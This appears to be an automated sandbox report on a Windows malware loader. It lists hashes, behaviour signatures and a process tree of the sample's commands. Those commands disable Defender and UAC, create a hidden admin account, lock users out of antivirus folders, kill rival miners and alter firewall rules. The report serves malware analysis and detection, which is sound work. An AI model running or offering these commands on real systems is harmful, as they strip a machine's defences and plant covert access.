Analysis
-
max time kernel
126s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
-
submitted
01/04/2025, 15:07
General
-
Target
2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe
-
Size
201KB
-
MD5
f513dc988cb2c77428b754ffb9669040
-
SHA1
e8e5386c5e7e53f0ef1270e92c1b45c2df3bd71a
-
SHA256
a36bb3dbfa3e5ecbbafc07e1f3829035101a2f5883667bf0cbe2e686857a9ccd
-
SHA512
80cbb72d888744352db1fe73139aee3beefb3d98f06c91f90cbc87f3be6470f5b890f41d8a75910a50fec7969cf310802bfba05c99ec70b1090789a1f790e99a
-
SSDEEP
3072:m5S0VvIH4lindUJXw58BkgnyNMIoVtmvVg4gdYbnybcapz/0Ic6o+Fc28V4EK:ma4InuJg58BkgqPoDH49n8Bb/c20Q
Score
10/10
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Possible privilege escalation attempt 64 IoCs
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 1 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 23 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\temp\Clean.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\microsoft\Temp\Clean.bat" "3⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc start AppIDSvc4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config AppIDSvc start= Auto4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc start AppMgmt4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config AppMgmt start= Auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM mbamservice.EXE /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop MinerGate4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MinerGate4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows\ServiceRun" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService2" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\Security Service2" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun0" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun1" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun2" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windowss\Data\ServiceRun3" /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "AzureSDKService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "WindowsUpdater" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "AdobeUppdate" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows\SpaceManagTask" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System\SecurityService" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows\ServiceRun" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Microsoft\Windows\WindowsUpdate\SUpdate" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\CampaignManager" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\FamilySafetyRefresherTask" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\ServiceRun" /F4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Windows\SpaceManagTask" /F4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v UseActionCenterExperience /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting" /v disable /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵
- Hide Artifacts: Hidden Users
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Programdata /t REG_SZ /d System /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ProgramData /t REG_DWORD /d 0 /f4⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v Exclusions_Paths /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\SysWOW64\net.exenet user John 12345 /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user John 12345 /add5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" john /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" john /add5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add5⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\COMODO\COMODO Internet Security"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO\COMODO Internet Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\360\Total Security"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360\Total Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SPYHUNTER4.EXE /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Program Files\Enigma Software Group\SpyHunter4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe" /deny Admin:(D,F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Program Files (x86)\SpyHunter4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Program Files\SpyHunter4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter\SpyHunter4.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter\SpyHunter4.exe" /deny ┬±σ:(D,F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM Cube.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\Cezurity"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Cezurity"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Cezurity4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\McAfee"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\McAfee"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\McAfee.com"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\McAfee.com" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Kaspersky Lab"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\Kaspersky Lab"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVG"4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files (x86)\AVG"4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Users\Admin\AppData\Local\Temp\grizzly-setup-cache"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\Temp\grizzly-setup-cache" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\appdata\roaming\microsoft\windows\helper.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\olly.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\iostream.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\SystemIdle.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\System Idle.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\Roaming\winhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\roaming\bot.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\roaming\nvidiadriver.exe"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\windows\helper.exe" /deny Admin:(D,F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\olly.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\iostream.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\SystemIdle.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\System Idle.exe" /deny Admin:(D,F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\Roaming\winhost.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\bot.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\nvidiadriver.exe" /deny Admin:(D,F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=7777 name="Block_7777"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule dir=out action=block protocol=tcp localport=7777 name="Block_7777"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Programdata\system32\logs\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM systemcore.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\roaming\subdir"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\subdir" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM serviceon.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM ifxpers.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "idle driver.exe" /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft software"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft software" /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "taskhost.exe" /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "intel1s.exe" /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "intel.exe" /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "intel1.exe" /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "taskhostss.exe" /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft software"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\Roaming\Microsoft\SystemCertificates" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM moonlight.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM moonlight.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\windows\syswow64\xmr64"4⤵
- Drops file in System32 directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\syswow64\xmr64" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel1.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\GOOGLE"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\GOOGLE" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ErrorCheck.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\macromedia"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\Roaming\macromedia" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM sidebar.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\programdata\System324⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM client.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostxmrig.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\windows\hhsm"4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\hhsm" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioSystemDriver.exe /T /F4⤵
